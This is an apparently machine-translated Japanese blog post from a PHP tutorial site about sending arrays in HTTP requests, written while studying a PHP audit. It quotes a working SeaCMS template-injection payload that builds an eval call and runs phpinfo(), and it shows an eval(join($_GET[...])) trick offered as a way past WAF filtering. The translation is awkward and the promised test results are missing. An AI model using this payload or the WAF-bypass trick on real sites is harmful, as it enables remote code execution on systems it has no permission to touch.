PHP が http リクエストを通じて配列を送信する方法の共有例

私は最近 PHP 監査を学習し始めましたが、ちょうど seacms を勉強するタイミングで、ペイロードに奇妙な点を発見しました

searchtype=5&searchword={
if{searchpage:year}&year=:e{searchpage:area}
}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();

試してみたところ、データを受信するときに次のようになっていることがわかりました。

キー名 = a、その後。 pass a[ ]=a&a[]=b、aは配列なのでテストしてみました

サーバーサイドのテストコード

<?php
	print_r($_GET[1]);
?>

テスト結果は以下の通りです

それで、この毛織物の用途は何でしょうか？よく考えてみると、サーバー上にセキュリティドッグやwafなどの保護ツールがあれば、join関数など他のPHPの機能を組み合わせることでバイパス効果が得られるかもしれません

簡単なアイデアを提供します

サーバーテストコード

<?php
	eval(join($_GET[123]));
?>

テスト結果は以下の通りです

以上がPHP が http リクエストを通じて配列を送信する方法の共有例の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。